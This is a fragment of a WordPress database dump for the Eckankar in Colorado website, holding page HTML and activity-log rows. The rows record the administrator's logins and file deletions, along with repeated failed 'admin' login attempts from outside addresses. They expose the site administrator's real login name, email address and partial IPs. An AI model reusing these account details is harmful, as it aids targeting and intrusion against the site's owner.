Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237251,40317,'post_id','68102'),(237249,40316,'_server_remote_addr','76.130.120.x'),(237250,40316,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(237248,40316,'_message_key','user_logged_in'),(237247,40316,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(237246,40316,'_user_email','nada@zipnadanot.org'),(237245,40316,'_user_login','S8zhaBda'),(237241,40316,'user_id','2'),(237242,40316,'user_email','nada@zipnadanot.org'),(237243,40316,'user_login','S8zhaBda'),(237244,40316,'_user_id','2'),(237240,40315,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(237152,40296,'failed_username','admin'),(237153,40296,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(237238,40315,'_message_key','user_logged_out'),(237239,40315,'_server_remote_addr','76.130.120.x'),(237237,40315,'_user_email','nada@zipnadanot.org'),(237236,40315,'_user_login','S8zhaBda'),(237235,40315,'_user_id','2'),(237234,40314,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(237233,40314,'_server_remote_addr','76.130.120.x'),(237232,40314,'_message_key','user_logged_in'),(237230,40314,'_user_email','nada@zipnadanot.org'),(237231,40314,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(237229,40314,'_user_login','S8zhaBda'),(237228,40314,'_user_id','2'),(237227,40314,'user_login','S8zhaBda'),(237226,40314,'user_email','nada@zipnadanot.org'),(237224,40313,'_server_remote_addr','104.244.76.x'),(237225,40314,'user_id','2'),(237223,40313,'_message_key','user_unknown_login_failed'),(237220,40312,'_server_remote_addr','20.168.8.x'),(237221,40313,'failed_username','admin'),(237222,40313,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(237219,40312,'_message_key','user_unknown_login_failed'),(237218,40312,'server_http_user_agent','Mozilla/5.0'),(237216,40311,'_server_remote_addr','198.98.49.x'),(237217,40312,'failed_username','admin'),(237215,40311,'_message_key','user_unknown_login_failed'),(237213,40311,'failed_username','administrator'),(237214,40311,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2'),(237212,40310,'_server_remote_addr','77.68.87.x'),(237211,40310,'_message_key','user_unknown_login_failed'),(237209,40310,'failed_username','admin'),(237210,40310,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(237208,40309,'_server_remote_addr','20.168.8.x'),(237207,40309,'_message_key','user_unknown_login_failed'),(237206,40309,'server_http_user_agent','Mozilla/5.0'),(237205,40309,'failed_username','admin'),(237204,40308,'_server_remote_addr','20.168.8.x'),(237202,40308,'server_http_user_agent','Mozilla/5.0'),(237203,40308,'_message_key','user_unknown_login_failed'),(237201,40308,'failed_username','admin'),(237200,40307,'_server_remote_addr','159.223.45.x'),(237199,40307,'_message_key','user_unknown_login_failed'),(237198,40307,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(237197,40307,'failed_username','admin'),(237196,40306,'_server_remote_addr','20.168.8.x'),(237195,40306,'_message_key','user_unknown_login_failed'),(237193,40306,'failed_username','admin'),(237194,40306,'server_http_user_agent','Mozilla/5.0'),(237192,40305,'_server_remote_addr','45.119.82.x'),(237191,40305,'_message_key','user_unknown_login_failed'),(237189,40305,'failed_username','admin'),(237190,40305,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(237188,40304,'_server_remote_addr','20.168.8.x'),(237187,40304,'_message_key','user_unknown_login_failed'),(237186,40304,'server_http_user_agent','Mozilla/5.0'),(237185,40304,'failed_username','admin'),(237183,40303,'_xmlrpc_request','true'),(237184,40303,'_server_remote_addr','20.168.9.x'),(237182,40303,'_message_key','user_unknown_login_failed'),(237181,40303,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(237179,40302,'_server_remote_addr','20.168.8.x'),(237180,40303,'failed_username','admin'),(237178,40302,'_message_key','user_unknown_login_failed'),(237177,40302,'server_http_user_agent','Mozilla/5.0'),(237176,40302,'failed_username','admin'),(237175,40301,'_server_remote_addr','162.214.72.x'),(237174,40301,'_message_key','user_unknown_login_failed'),(237173,40301,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(237172,40301,'failed_username','admin'),(237171,40300,'_server_remote_addr','20.168.8.x'),(237169,40300,'server_http_user_agent','Mozilla/5.0'),(237170,40300,'_message_key','user_unknown_login_failed'),(237168,40300,'failed_username','admin'),(237167,40299,'_server_remote_addr','45.119.82.x'),(237166,40299,'_message_key','user_unknown_login_failed'),(237165,40299,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(237164,40299,'failed_username','admin'),(237163,40298,'_server_remote_addr','20.168.8.x'),(237162,40298,'_message_key','user_unknown_login_failed'),(237160,40298,'failed_username','admin'),(237161,40298,'server_http_user_agent','Mozilla/5.0'),(237159,40297,'_server_remote_addr','20.168.8.x'),(237158,40297,'_message_key','user_unknown_login_failed'),(237157,40297,'server_http_user_agent','Mozilla/5.0'),(237156,40297,'failed_username','admin'),(237154,40296,'_message_key','user_unknown_login_failed'),(237155,40296,'_server_remote_addr','37.187.135.x'),(237149,40295,'server_http_user_agent','Mozilla/5.0'),(237150,40295,'_message_key','user_unknown_login_failed'),(237151,40295,'_server_remote_addr','20.168.8.x'),(237147,40294,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=boldgrid-backup'),(237148,40295,'failed_username','admin'),(237146,40294,'_server_remote_addr','76.130.120.x'),(237145,40294,'_message_key','user_logged_out'),(237143,40294,'_user_login','S8zhaBda'),(237144,40294,'_user_email','nada@zipnadanot.org'),(237142,40294,'_user_id','2'),(237141,40293,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(237139,40293,'_user_email','nada@zipnadanot.org'),(237140,40293,'_server_remote_addr','76.130.120.x'),(237138,40293,'_user_login','S8zhaBda'),(237137,40293,'_user_id','2'),(237134,40293,'attachment_filename','wave-white-2.png'),(237135,40293,'attachment_mime','image/png'),(237136,40293,'_message_key','attachment_deleted'),(237133,40293,'attachment_title','wave-white-2'),(237132,40293,'attachment_id','269274'),(237131,40293,'post_type','attachment'),(237130,40292,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(237129,40292,'_server_remote_addr','76.130.120.x'),(237128,40292,'_user_email','nada@zipnadanot.org'),(237127,40292,'_user_login','S8zhaBda'),(237125,40292,'_message_key','attachment_deleted'),(237126,40292,'_user_id','2'),(237124,40292,'attachment_mime','image/png'),(237123,40292,'attachment_filename','wave-white-2-300-height.png'),(237122,40292,'attachment_title','wave-white-2-300-height'),(237120,40292,'post_type','attachment'),(237121,40292,'attachment_id','269276'),(237119,40291,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(237118,40291,'_server_remote_addr','76.130.120.x'),(237117,40291,'_user_email','nada@zipnadanot.org'),(237115,40291,'_user_id','2'),(237116,40291,'_user_login','S8zhaBda'),(237114,40291,'_message_key','attachment_deleted'),(237113,40291,'attachment_mime','image/png'),(237112,40291,'attachment_filename','wave-white-2-h-200.png'),(237111,40291,'attachment_title','wave-white-2-h-200'),(237109,40291,'post_type','attachment'),(237110,40291,'attachment_id','269279'),(237108,40290,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(237107,40290,'_server_remote_addr','76.130.120.x'),(237106,40290,'_user_email','nada@zipnadanot.org'),(237104,40290,'_user_id','2'),(237105,40290,'_user_login','S8zhaBda'),(237103,40290,'_message_key','attachment_deleted'),(237102,40290,'attachment_mime','image/png'),(237101,40290,'attachment_filename','wave-white-2-h-250.png'),(237099,40290,'attachment_id','269281'),(237100,40290,'attachment_title','wave-white-2-h-250'),(237098,40290,'post_type','attachment'),(237097,40289,'_server_remote_addr','69.163.224.x'),(237096,40289,'_message_key','user_unknown_login_failed'),(237095,40289,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(237094,40289,'failed_username','admin'),(237093,40288,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237091,40288,'_user_email','nada@zipnadanot.org'),(237092,40288,'_server_remote_addr','76.130.120.x'),(237090,40288,'_user_login','S8zhaBda'),(237089,40288,'_user_id','2'),(237088,40288,'_message_key','post_updated'),(237087,40288,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div 